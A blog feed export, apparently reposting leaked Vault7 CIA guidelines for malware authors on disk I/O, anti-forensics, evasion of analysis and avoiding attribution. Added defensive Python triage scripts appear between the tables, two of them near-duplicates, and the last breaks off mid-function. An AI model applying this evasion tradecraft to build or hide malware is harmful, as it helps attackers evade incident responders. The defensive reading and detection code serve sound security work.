Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Mention"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Smart Hyperlink"/>
</w:LatentStyles>
</xml><![endif]-->
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Vulnerabilities in Hardware</span></div>
Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com2tag:blogger.com,1999:blog-1852980805947568568.post-61963194097517091612017-04-08T02:43:00.002+05:302017-04-08T02:43:55.279+05:30Vault7: Malware and Disk I/O (Input Output)<br />
The following are the guidelines given to malware authors at the CIA on handling disk I/O: what to do when saving data to disk and when deleting saved data from disk.<br />
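As an added example (this editor's code, not from the post or from the leaked document), here is the defender's-side check that follows from the directives tabulated below on encrypting all output and giving encrypted files no magic header: a triage script that flags files carrying no recognisable signature whose bytes nonetheless look near-random. The signature table, the 7.5 bits/byte threshold and the sample files are all constructed assumptions.

```python
"""Entropy/signature triage for header-less files on disk.

Added example (this editor's code, not from the post or the leaked document).
Motivated by the directives below: encrypt everything written to disk and give
encrypted files no magic header/footer. From the defender's side that shape,
a file with no recognisable signature whose bytes look near-random, is itself
a hunting lead.
"""
import hashlib
import math
import tempfile
from collections import Counter
from pathlib import Path

# Real signatures for a handful of common formats; a production scan would use
# libmagic or a fuller table. Containers that are compressed or encrypted
# (zip, gzip, 7z, xz) still carry a signature, so they are not flagged.
KNOWN_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"%PDF": "pdf",
    b"PK\x03\x04": "zip",
    b"\x1f\x8b": "gzip",
    b"BZh": "bzip2",
    b"\xfd7zXZ\x00": "xz",
    b"7z\xbc\xaf\x27\x1c": "7z",
    b"\x7fELF": "elf",
    b"MZ": "pe",
    b"SQLite format 3\x00": "sqlite",
}

# Assumed threshold in bits per byte; 8.0 is the ceiling for uniform random data.
HIGH_ENTROPY = 7.5


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of the byte distribution, in bits per byte (0.0 if empty)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def known_format(data: bytes):
    """Name of the format whose signature the data starts with, else None."""
    for magic, name in KNOWN_MAGIC.items():
        if data.startswith(magic):
            return name
    return None


def classify(data: bytes, threshold: float = HIGH_ENTROPY) -> str:
    """'known-format'        : starts with a signature, leave it to normal tooling
       'opaque-high-entropy' : no signature and near-random bytes; worth a look
       'low-entropy'         : no signature but structured or plaintext content"""
    if known_format(data) is not None:
        return "known-format"
    if shannon_entropy(data) >= threshold:
        return "opaque-high-entropy"
    return "low-entropy"


def scan_directory(root, min_size: int = 512, threshold: float = HIGH_ENTROPY):
    """Return (path, entropy, verdict) for each regular file under root.
    Files under min_size bytes are skipped: entropy is noisy on tiny inputs."""
    results = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.stat().st_size < min_size:
            continue
        data = path.read_bytes()
        results.append((str(path), round(shannon_entropy(data), 3),
                        classify(data, threshold)))
    return results


# Constructed sample inputs (deterministic, not real artefacts).
# Chained SHA-256 digests stand in for an encrypted, header-less output file.
OPAQUE_SAMPLE = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(256))
# Plaintext log lines: no signature either, but far from random.
TEXT_SAMPLE = b"2017-04-08 02:43:00 service started\n" * 64
# The same random payload behind a PNG signature: a known format, not flagged.
PNG_LIKE_SAMPLE = b"\x89PNG\r\n\x1a\n" + OPAQUE_SAMPLE


def demo(root=None):
    """Write the three samples into a scratch directory and scan it."""
    root = root or tempfile.mkdtemp(prefix="entropy-triage-")
    for name, blob in (("opaque.bin", OPAQUE_SAMPLE),
                       ("app.log", TEXT_SAMPLE),
                       ("image.png", PNG_LIKE_SAMPLE)):
        Path(root, name).write_bytes(blob)
    return scan_directory(root)


if __name__ == "__main__":
    for path, ent, verdict in demo():
        print(f"{verdict:22s} {ent:5.3f}  {path}")
```

Legitimate header-less high-entropy files (raw key material, some database or cache formats) surface too, so the verdict is a lead for a closer look, not a detection on its own.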
<table style="background-color: white; border-collapse: collapse; border-spacing: 0px; box-sizing: inherit; color: #555555; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; margin: 1em; max-width: 100%;"><tbody style="box-sizing: inherit;">
<tr style="box-sizing: inherit;"><th style="background-color: #cccccc; box-sizing: inherit; padding: 0.2em 0.5em; text-align: left;">Directive</th><th style="background-color: #cccccc; box-sizing: inherit; padding: 0.2em 0.5em; text-align: left;">Rationale</th></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;"><div style="box-sizing: inherit; margin-bottom: 0.72em;">
DO explicitly document the "disk forensic footprint" that could be potentially created by various features of a binary/tool on a remote target.</div>
</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Enables better operational risk assessments with knowledge of potential file system forensic artefacts.</td></tr>
<tr style="box-sizing: inherit;"><td style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT read, write and/or cache data to disk unnecessarily. Be cognizant of 3rd party code that may implicitly write/cache data to disk.</td><td style="box-sizing: inherit; padding: 0.2em 0.5em;">Lowers potential for forensic artefacts and potential signatures.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT write plain-text collection data to disk.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Raises difficulty of incident response and forensic analysis.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO encrypt all data written to disk.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Disguises intent of file (collection, sensitive code, etc) and raises difficulty of forensic analysis and incident response.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;"><div style="box-sizing: inherit; margin-bottom: 0.72em;">
DO utilize a secure erase when removing a file from disk that wipes at a minimum the file's filename, datetime stamps (create, modify and access) and its content.</div>
<div style="box-sizing: inherit; margin-bottom: 0.72em;">
(Note: The definition of "secure erase" varies from filesystem to filesystem, but at least a single pass of zeros of the data should be performed. The emphasis here is on removing all filesystem artefacts that could be useful during forensic analysis)</div>
</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Raises difficulty of incident response and forensic analysis.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;"><div style="box-sizing: inherit; margin-bottom: 0.72em;">
DO NOT perform Disk I/O operations that will cause the system to become unresponsive to the user or alerting to a System Administrator.</div>
</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Avoids unwanted attention from the user or system administrator to tool's existence and behavior.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT use a "magic header/footer" for encrypted files written to disk. All encrypted files should be completely opaque data files.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Avoids signature of custom file format's magic values.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT use hard-coded filenames or filepaths when writing files to disk. This must be configurable at deployment time by the operator.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Allows the operator to choose a filename that fits within the operational target.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO have a configurable maximum size limit and/or output file count for writing encrypted output files.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;"><div style="box-sizing: inherit; margin-bottom: 0.72em;">
Avoids situations where a collection task can get out of control and fills the target's disk; which will draw unwanted attention to the tool and/or the operation.</div>
</td></tr>
</tbody></table>
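The rows above tell a tool author to encrypt everything written to disk and to avoid magic headers or footers. Reversing that logic gives a defender's check: look for files that are high-entropy yet carry no recognisable format signature. The Python script below is an added example (not from the original post or the leaked document); its signature table, the 7.2-bit threshold, the directory walker and the sample blobs are this example's own assumptions.<br />

```python
"""Opaque-file triage: the defender's inverse of the disk-I/O directives above.

Added example, not part of the original post. The table tells tool authors to
encrypt everything written to disk and to avoid magic headers; the inverse
check is to look for files that are high-entropy yet carry no known format
signature. The magic table, the 7.2-bit threshold and the sample blobs are
this example's assumptions.
"""
import math
import os
from collections import Counter

# Assumption: a few common signatures; real triage would use libmagic.
KNOWN_MAGIC = {
    b"MZ": "PE/DOS executable",
    b"\x7fELF": "ELF",
    b"%PDF": "PDF",
    b"PK\x03\x04": "ZIP/OOXML/JAR",
    b"\x1f\x8b": "gzip",
    b"\x89PNG": "PNG",
    b"\xff\xd8\xff": "JPEG",
    b"Rar!": "RAR",
    b"7z\xbc\xaf\x27\x1c": "7-Zip",
}
HIGH_ENTROPY = 7.2   # bits per byte; random or encrypted data approaches 8.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def known_format(data: bytes):
    """Return the format name if the blob starts with a known signature, else None."""
    for magic, name in KNOWN_MAGIC.items():
        if data.startswith(magic):
            return name
    return None


def classify_blob(data: bytes) -> str:
    """'known:<fmt>', 'opaque-high-entropy' or 'low-entropy'.

    Compressed formats (gzip, PNG, ZIP) are high-entropy too, which is why the
    signature check runs first; only headerless high-entropy data is flagged,
    since that is exactly what the directives above produce.
    """
    fmt = known_format(data)
    if fmt:
        return f"known:{fmt}"
    if shannon_entropy(data) >= HIGH_ENTROPY:
        return "opaque-high-entropy"
    return "low-entropy"


def scan_tree(root: str, min_size: int = 4096):
    """Walk a directory and yield (path, entropy) for opaque high-entropy files."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) < min_size:
                    continue
                with open(path, "rb") as fh:
                    head = fh.read(1 << 20)      # the first MiB is enough to classify
            except OSError:
                continue
            if classify_blob(head) == "opaque-high-entropy":
                yield path, shannon_entropy(head)


# Constructed samples: an encrypted-looking blob (every byte value equally
# likely, entropy exactly 8.0), the same bytes behind a gzip magic, and text.
SAMPLE_OPAQUE = bytes(range(256)) * 16
SAMPLE_GZIP = b"\x1f\x8b" + SAMPLE_OPAQUE
SAMPLE_TEXT = b"collection log entry: user logged in\n" * 100

if __name__ == "__main__":
    for label, blob in [("opaque", SAMPLE_OPAQUE), ("gzip", SAMPLE_GZIP), ("text", SAMPLE_TEXT)]:
        print(f"{label:7s} entropy={shannon_entropy(blob):.2f} -> {classify_blob(blob)}")
```

Run it against a suspect host with <span style="font-family: Courier New, Courier, monospace;">for p, e in scan_tree("C:\\ProgramData"): print(p, e)</span>; the signature check first keeps archives and images out of the hit list, so what remains is exactly the headerless, encrypted output the table prescribes.<br />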
<br />
<br />Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com4tag:blogger.com,1999:blog-1852980805947568568.post-53377223733673516492017-04-08T02:34:00.002+05:302017-04-08T02:34:41.544+05:30Vault7: Malware evasion and Reverse Engineering difficulty Comparison
This is essentially a list of do's and don'ts for a malware author. The table below explains how a malware author evades scrutiny by anti-virus engines, analysts and reverse-engineers; by reversing that logic, defenders can use the same points to detect and attribute the malware. The pointers apply to PE, Mach-O, ELF and other binaries.<br />
<table style="background-color: white; border-collapse: collapse; border-spacing: 0px; box-sizing: inherit; color: #555555; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; margin: 1em; max-width: 100%;"><tbody style="box-sizing: inherit;">
<tr style="box-sizing: inherit;"><th style="background-color: #cccccc; box-sizing: inherit; padding: 0.2em 0.5em; text-align: left;">Evasion</th><th style="background-color: #cccccc; box-sizing: inherit; padding: 0.2em 0.5em; text-align: left;">Rationale/Detection</th></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;"><div style="box-sizing: inherit; margin-bottom: 0.72em;">
DO obfuscate or encrypt all strings and configuration data that directly relate to tool functionality. Consideration should be made to also only de-obfuscating strings in-memory at the moment the data is needed. When a previously de-obfuscated value is no longer needed, it should be wiped from memory.</div>
</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">String data and/or configuration data is very useful to analysts and reverse-engineers.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT decrypt or de-obfuscate all string data or configuration data immediately upon execution.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Raises the difficulty for automated dynamic analysis of the binary to find sensitive data.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;"><div style="box-sizing: inherit; margin-bottom: 0.72em;">
DO explicitly remove sensitive data (encryption keys, raw collection data, shellcode, uploaded modules, etc) from memory as soon as the data is no longer needed in plain-text form.</div>
<div style="box-sizing: inherit; margin-bottom: 0.72em;">
DO NOT RELY ON THE OPERATING SYSTEM TO DO THIS UPON TERMINATION OF EXECUTION.</div>
</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Raises the difficulty for incident response and forensics review.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO utilize a deployment-time unique key for obfuscation/de-obfuscation of sensitive strings and configuration data.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Raises the difficulty of analysis of multiple deployments of the same tool.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO strip all debug symbol information, manifests(MSVC artefact), build paths, developer usernames from the final build of a binary.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Raises the difficulty for analysis and reverse-engineering, and removes artefacts used for attribution/origination.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO strip all debugging output (e.g. calls to printf(), OutputDebugString(), etc) from the final build of a tool.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Raises the difficulty for analysis and reverse-engineering.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT explicitly import/call functions that are not consistent with a tool's overt functionality (i.e. WriteProcessMemory, VirtualAlloc, CreateRemoteThread, etc - for a binary that is supposed to be a notepad replacement).</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Lowers potential scrutiny of binary and slightly raises the difficulty for static analysis and reverse-engineering.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT export sensitive function names; if having exports are required for the binary, utilize an ordinal or a benign function name.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Raises the difficulty for analysis and reverse-engineering.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;"><div style="box-sizing: inherit; margin-bottom: 0.72em;">
DO NOT generate crash dump files, core dump files, "Blue" screens, Dr Watson or other dialog pop-ups and/or other artefacts in the event of a program crash.</div>
<div style="box-sizing: inherit; margin-bottom: 0.72em;">
DO attempt to force a program crash during unit testing in order to properly verify this.</div>
</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Avoids suspicion by the end user and system admins, and raises the difficulty for incident response and reverse-engineering.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT perform operations that will cause the target computer to be unresponsive to the user (e.g. CPU spikes, screen flashes, screen "freezing", etc).</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Avoids unwanted attention from the user or system administrator to tool's existence and behaviour.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td style="box-sizing: inherit; padding: 0.2em 0.5em;">DO make all reasonable efforts to minimize binary file size for all binaries that will be uploaded to a remote target (<u style="box-sizing: inherit;">without</u> the use of packers or compression). Ideal binary file sizes should be under 150KB for a fully featured tool.</td><td style="box-sizing: inherit; padding: 0.2em 0.5em;">Shortens overall "time on air" not only to get the tool on target, but to time to execute functionality and clean-up.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO provide a means to completely "uninstall"/"remove" implants, function hooks, injected threads, dropped files, registry keys, services, forked processes, etc whenever possible. Explicitly document (even if the documentation is "There is no uninstall for this &lt;feature&gt;") the procedures, permissions required and side effects of removal.</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Avoids unwanted data left on target. Also, proper documentation allows operators to make better operational risk assessment and fully understand the implications of using a tool or specific feature of a tool.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT leave dates/times such as compile timestamps, linker timestamps, build times, access times, etc. that correlate to general US core working hours (i.e. 8am-6pm Eastern time)</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Avoids direct correlation to origination in the United States.</td></tr>
<tr style="box-sizing: inherit;"><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;"><div style="box-sizing: inherit; margin-bottom: 0.72em;">
DO NOT leave data in a binary file that demonstrates CIA, USG, or its witting partner companies involvement in the creation or use of the binary/tool.</div>
</td><td colspan="1" style="box-sizing: inherit; padding: 0.2em 0.5em;">Attribution of binary/tool/etc by an adversary can cause irreversible impacts to past, present and future USG operations and equities.</td></tr>
<tr style="background-color: #eeeeee; box-sizing: inherit;"><td style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT have data that contains CIA and USG cover terms, compartments, operation code names or other CIA and USG specific terminology in the binary.</td><td style="box-sizing: inherit; padding: 0.2em 0.5em;">Attribution of binary/tool/etc by an adversary can cause irreversible impacts to past, present and future USG operations and equities.</td></tr>
<tr style="box-sizing: inherit;"><td style="box-sizing: inherit; padding: 0.2em 0.5em;">DO NOT have "dirty words" in the binary.</td><td style="box-sizing: inherit; padding: 0.2em 0.5em;">Dirty words, such as hacker terms, may cause unwarranted scrutiny of the binary file in question.</td></tr>
</tbody></table>
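By reversing the table's logic, a defender can triage a suspect binary for exactly the artefacts it tells tool authors to strip. The Python script below is an added example (not part of the original post or the leaked document): it reads the linker timestamp from the COFF header and checks it against 8am-6pm Eastern on a weekday, flags injection APIs that are inconsistent with an overt purpose, and scans exports and strings for build paths that leak usernames and for "dirty words". The API set, the word list, the fixed UTC-5 offset (DST ignored) and the constructed sample are this example's own assumptions.<br />

```python
"""Binary triage derived from the Vault7 DO/DON'T table above.

Added example, not from the original post or the leaked document. It takes
the facts a PE parser would extract (raw header bytes, import and export
names, printable strings) and reports the artefacts the table tells tool
authors to strip. The API set, word list and fixed UTC-5 offset (no DST
handling) are this example's assumptions.
"""
import re
import struct
from datetime import datetime, timedelta, timezone

EASTERN = timezone(timedelta(hours=-5))   # assumption: fixed offset, DST ignored
WORK_START, WORK_END = 8, 18               # 8am-6pm Eastern, from the table

# Assumption: APIs that only make sense for injecting into other processes.
INJECTION_APIS = {
    "WriteProcessMemory", "VirtualAllocEx", "CreateRemoteThread",
    "NtUnmapViewOfSection", "SetThreadContext", "QueueUserAPC",
}
# Assumption: a small "dirty word" list; extend it for real triage.
DIRTY_WORDS = ("hack", "exploit", "payload", "shellcode", "inject", "backdoor", "keylog")
# Build paths such as C:\Users\<name>\... leak the developer's username.
USER_PATH = re.compile(r"[A-Za-z]:\\(?:Users|Documents and Settings)\\([^\\]+)\\", re.I)


def build_pe_stub(timestamp: int) -> bytes:
    """Constructed MZ/PE header (not a runnable executable) carrying a COFF TimeDateStamp."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 0, timestamp, 0, 0, 0, 0)   # i386, 0 sections
    return dos + b"PE\0\0" + coff


def coff_timestamp(data: bytes) -> int:
    """Read TimeDateStamp from the COFF file header (signature + Machine + NumberOfSections)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return struct.unpack_from("<I", data, e_lfanew + 8)[0]


def in_us_working_hours(timestamp: int) -> bool:
    """True for a weekday timestamp between 8am and 6pm Eastern."""
    t = datetime.fromtimestamp(timestamp, tz=EASTERN)
    return t.weekday() < 5 and WORK_START <= t.hour < WORK_END


def triage(pe_bytes: bytes, imports, exports, strings) -> list:
    """Return human-readable findings; an empty list means nothing stood out."""
    findings = []
    ts = coff_timestamp(pe_bytes)
    if ts == 0:
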